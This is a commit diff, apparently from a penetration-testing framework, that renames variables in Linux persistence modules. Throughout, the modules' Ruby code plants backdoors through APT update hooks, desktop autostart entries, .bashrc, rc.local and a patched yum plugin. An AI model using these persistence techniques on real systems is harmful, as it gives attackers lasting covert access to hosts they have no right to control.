linux persistence standardize variable names, write cmd payloads to backdoored files

Author: h00die

documentation/modules/exploit/linux/persistence/apt_package_manager.md

@@ -19,7 +19,7 @@ When the system runs `apt-get update` the payload will launch.
 
 ## Options
 
-### BACKDOOR_NAME
+### PAYLOAD_NAME
 
 Name of backdoor executable. Defaults to a random name
 

documentation/modules/exploit/linux/persistence/bash_profile.md

@@ -22,7 +22,7 @@ Verified on Ubuntu 22.04 and 18.04 desktop with Gnome
 
 The path to the target Bash profile. Defaults to `.bashrc`
 
-### BACKDOOR_NAME
+### PAYLOAD_NAME
 
 Name of the payload file. Defaults to random
 

documentation/modules/exploit/linux/persistence/yum_package_manager.md

@@ -21,7 +21,7 @@ When the system runs yum update the payload will launch.  You must set handler a
 
 ## Options
 
-### BACKDOOR_NAME
+### PAYLOAD_NAME
 
 Name of backdoor executable
 

modules/exploits/linux/persistence/apt_package_manager.rb

@@ -83,18 +83,19 @@ def install_persistence
     if payload.arch.first == 'cmd'
       hook_script = %(APT::Update::Pre-Invoke {"setsid #{payload.encoded} 2>/dev/null &"};)
     else
-      backdoor_path = datastore['WritableDir']
-      backdoor_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
-      backdoor_path << backdoor_name
-      write_file(backdoor_path, generate_payload_exe)
-      fail_with Failure::Unknown, "Failed to write #{backdoor_path}" unless exist?(backdoor_path)
-      print_status("Backdoor uploaded #{backdoor_path}")
+      payload_path = datastore['WritableDir']
+      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      payload_path << payload_name
+      write_file(payload_path, generate_payload_exe)
+      fail_with Failure::Unknown, "Failed to write #{payload_path}" unless exist?(payload_path)
+      print_status("Backdoor uploaded #{payload_path}")
       # permissions chosen to reflect common perms in /usr/local/bin/
-      chmod(backdoor_path, 0o755)
+      chmod(payload_path, 0o755)
 
       print_status('Attempting to write hook')
-      hook_script = %(APT::Update::Pre-Invoke {"setsid #{backdoor_path} 2>/dev/null &"};)
-      @clean_up_rc << "rm #{backdoor_path}\n"
+      hook_script = %(APT::Update::Pre-Invoke {"setsid #{payload_path} 2>/dev/null &"};)
+      @clean_up_rc << "rm #{payload_path}\n"
     end
     write_file(datastore['HOOKPATH'], hook_script)
 

modules/exploits/linux/persistence/autostart.rb

@@ -107,20 +107,20 @@ def install_persistence
     if payload.arch.first == 'cmd'
       write_file(path, (autostart_stub + ["Exec=/bin/sh -c \"#{payload.encoded}\""]).join("\n"))
     else
-      backdoor_path = datastore['WritableDir']
-      backdoor_path = backdoor_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"
-      backdoor_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
-      backdoor_path << backdoor_name
-      print_status("Uploading payload file to #{backdoor_path}")
-      upload_and_chmodx backdoor_path, generate_payload_exe
-      write_file(path, (autostart_stub + ["Exec=\"#{backdoor_path}\""]).join("\n"))
-      @clean_up_rc << "rm #{backdoor_path}\n"
+      payload_path = datastore['WritableDir']
+      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      payload_path << payload_name
+      print_status("Uploading payload file to #{payload_path}")
+      upload_and_chmodx payload_path, generate_payload_exe
+      write_file(path, (autostart_stub + ["Exec=\"#{payload_path}\""]).join("\n"))
+      @clean_up_rc << "rm #{payload_path}\n"
     end
 
     if whoami != user
       cmd_exec("chown #{user}:#{user} #{path}")
       unless payload.arch.first == 'cmd'
-        cmd_exec("chown #{user}:#{user} #{backdoor_path}")
+        cmd_exec("chown #{user}:#{user} #{payload_path}")
       end
     end
 

modules/exploits/linux/persistence/bash_profile.rb

@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Unix
   include Msf::Auxiliary::Report
+  include Msf::Exploit::EXE # for generate_payload_exe
   include Msf::Post::Linux::User
   include Msf::Exploit::Local::Persistence
   prepend Msf::Exploit::Remote::AutoCheck
@@ -31,9 +32,21 @@ def initialize(info = {})
         'Author' => [
           'Michael Long <bluesentinel[at]protonmail.com>'
         ],
+        'Payload' => {
+          'BadChars' => '#%\n"'
+        },
         'DisclosureDate' => '1989-06-08', # First public release of Bourne Again Shell
         'Platform' => ['unix', 'linux'],
-        'Arch' => ARCH_CMD,
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
         'SessionTypes' => ['meterpreter', 'shell'],
         'Targets' => [
           ['Automatic', {}]
@@ -94,20 +107,26 @@ def install_persistence
     backup_profile_path = store_loot("desktop.#{datastore['BASH_PROFILE'].split('/').last}", 'text/plain', session, backup_profile, datastore['BASH_PROFILE'].split('/').last, 'bash profile backup')
     print_status("Created backup Bash profile: #{backup_profile_path}")
 
-    # upload persistent payload to target and make executable (chmod 700)
-    backdoor_path = datastore['WritableDir']
-    backdoor_path = backdoor_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"
-    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
-    backdoor_path << backdoor_name
-    upload_and_chmodx(backdoor_path, payload.encoded)
-
-    # write payload trigger to Bash profile
-    exec_payload_string = "#{backdoor_path} > /dev/null 2>&1 & \n" # send stdin,out,err to /dev/null
+    if payload.arch.first == 'cmd'
+      pload = payload.encoded
+      pload = pload.sub(/&$/, '') # remove trailing & since we add it later
+      exec_payload_string = "#{pload} > /dev/null 2>&1 & \n" # send stdin,out,err to /dev/null
+    else
+      # upload persistent payload to target and make executable (chmod 700)
+      payload_path = datastore['WritableDir']
+      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+      payload_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+      payload_path << payload_name
+      upload_and_chmodx(payload_path, generate_payload_exe)
+
+      # write payload trigger to Bash profile
+      exec_payload_string = "#{payload_path} > /dev/null 2>&1 & \n" # send stdin,out,err to /dev/null
+    end
     append_file(ppath, exec_payload_string)
     vprint_status('Created Bash profile persistence')
     print_good('Payload will be triggered when target opens a Bash terminal')
 
-    @clean_up_rc << "rm #{backdoor_path}\n"
+    @clean_up_rc << "rm #{payload_path}\n"
     @clean_up_rc << "upload #{backup_profile_path} #{ppath}"
   end
 end

modules/exploits/linux/persistence/rc_local.rb

@@ -98,14 +98,14 @@ def install_persistence
       rc_local << "\n#{pload}\nexit 0\n"
       print_status "Patching #{rc_path}"
     else
-      backdoor_path = datastore['WritableDir']
-      backdoor_path = backdoor_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"
-      backdoor_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
-      backdoor_path << backdoor_name
-      print_status("Uploading payload file to #{backdoor_path}")
-      upload_and_chmodx backdoor_path, generate_payload_exe
-      rc_local << "\n#{backdoor_path} &\nexit 0\n"
-      @clean_up_rc << "rm #{backdoor_path}\n"
+      payload_path = datastore['WritableDir']
+      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      payload_path << payload_name
+      print_status("Uploading payload file to #{payload_path}")
+      upload_and_chmodx payload_path, generate_payload_exe
+      rc_local << "\n#{payload_path} &\nexit 0\n"
+      @clean_up_rc << "rm #{payload_path}\n"
     end
 
     # write new file

modules/exploits/linux/persistence/yum_package_manager.rb

@@ -61,7 +61,7 @@ def initialize(info = {})
       [
         # /usr/lib/yum-plugins/fastestmirror.py is a default enabled plugin in centos
         OptString.new('PLUGIN', [true, 'Yum Plugin to target', 'fastestmirror.py']),
-        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
+        OptString.new('PAYLOAD_NAME', [false, 'Name of binary to write'])
       ]
     )
 
@@ -115,13 +115,14 @@ def install_persistence
     print_warning('Either Yum has never been executed, or the selected plugin has not run') unless exist? "#{full_plugin_path}c"
 
     # check for write in backdoor path and set/generate backdoor name
-    backdoor_path = datastore['WritableDir']
-    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
-    backdoor_path << backdoor_name
+    payload_path = datastore['WritableDir']
+    payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+    payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+    payload_path << payload_name
 
     # check for sed binary and then append launcher to plugin underneath
     print_status('Attempting to modify plugin')
-    launcher = "os.system('setsid #{backdoor_path} 2>/dev/null \\& ')"
+    launcher = "os.system('setsid #{payload_path} 2>/dev/null \\& ')"
     sed_path = cmd_exec 'command -v sed'
     unless sed_path.include?('sed')
       fail_with Failure::NotVulnerable, 'Module uses sed to modify plugin, sed was not found'
@@ -131,18 +132,18 @@ def install_persistence
 
     # actually write users payload to be executed then check for write
     if payload.arch.first == 'cmd'
-      write_file(backdoor_path, payload.encoded)
+      write_file(payload_path, payload.encoded)
     else
-      write_file(backdoor_path, generate_payload_exe)
+      write_file(payload_path, generate_payload_exe)
     end
-    @clean_up_rc << "rm #{backdoor_path}\n"
-    unless exist? backdoor_path
-      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+    @clean_up_rc << "rm #{payload_path}\n"
+    unless exist? payload_path
+      fail_with Failure::Unknown, "Failed to write #{payload_path}"
     end
 
     # change perms to reflect bins in /usr/local/bin/, give good feels
-    chmod(backdoor_path, 0o755)
-    print_status("Backdoor uploaded to #{backdoor_path}")
+    chmod(payload_path, 0o755)
+    print_status("Backdoor uploaded to #{payload_path}")
     print_good('Backdoor will run on next Yum update')
   end
 end